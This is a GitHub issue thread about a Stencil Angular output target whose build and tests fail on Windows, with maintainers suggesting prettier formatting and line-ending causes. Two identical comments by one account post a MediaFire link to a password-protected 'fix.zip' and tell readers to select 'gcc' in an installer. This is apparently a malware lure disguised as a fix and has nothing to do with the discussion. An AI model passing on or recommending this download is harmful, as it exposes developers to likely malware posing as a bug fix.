### ISSUE TITLE
bug: 

### ISSUE THREAD

**Issue by mdellanave** [ionic-team/stencil-ds-output-targets#462]
### Prerequisites

- [X] I have read the [Contributing Guidelines](https://github.com/ionic-team/stencil/blob/main/.github/CONTRIBUTING.md).
- [X] I agree to follow the [Code of Conduct](https://github.com/ionic-team/stencil/blob/main/CODE_OF_CONDUCT.md).
- [X] I have searched for [existing issues](https://github.com/ionic-team/stencil-ds-output-targets/issues) that already report this problem, without success.

### Stencil Version

4.16

### Stencil Framework Output Target

Angular

### Stencil Framework Output Target Version

0.8.4

### Current Behavior

running pnpm build fails due to this error
![image](https://github.com/user-attachments/assets/fd2b3254-977f-4d33-ad58-662af1fc9fe1)

### Expected Behavior

should pass the tests and creates all the libraries

### Steps to Reproduce

download the main branch and follow the instructions in readme file

### Code Reproduction URL

https://github.com/ionic-team/stencil-ds-output-targets

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sean-perkins** [comment]
I do not believe the README includes instructions for running the tests, only installing and building the projects in the workspace. 

The screenshot indicates the diffs are caused by code formatting. The component wrappers are generated with a static formatting output and then are expected to be formatted by the developers configuration (prettier, etc.). 

Can you try running prettier and then see if the tests pass on your end? 

`npm run prettier` from the root of the workspace should format all projects.

**Comment by christian-bromann** [comment]
I wonder if this is related to the fact that Windows is being used here. Our pipeline as well as most of machines our devs run are Linux based (most folks use Macs).

**Comment by sean-perkins** [comment]
Yeah I think it has to be a character encoding difference between Windows and Unix systems. I didn't include it in my original comment, but the `--write` flag should be passed to prettier:
```
pnpm run prettier -- --write
```

However I was unable to get the tests to fail with:
- `pnpm install`
- `pnpm run build`
- `pnpm run test`

as well as they are passing in CI. 

With our [maintenance status](https://github.com/ionic-team/stencil-ds-output-targets/issues/462#issuecomment-2309540708), we are unlikely to prioritize investigation into this issue. We'd gladly welcome a contribution if you are able to root cause the issue.

**Comment by mdellanave** [comment]
if I run pnpm run prettier --write (or pnpm run prettier -- --write as @sean-perkins wrote)
![image](https://github.com/user-attachments/assets/9a24a784-676d-4a92-a72c-16d32f68362b)

Which version of pnpm are you using guys?
![image](https://github.com/user-attachments/assets/a7d56440-1778-4155-a4af-c27962a3f594)
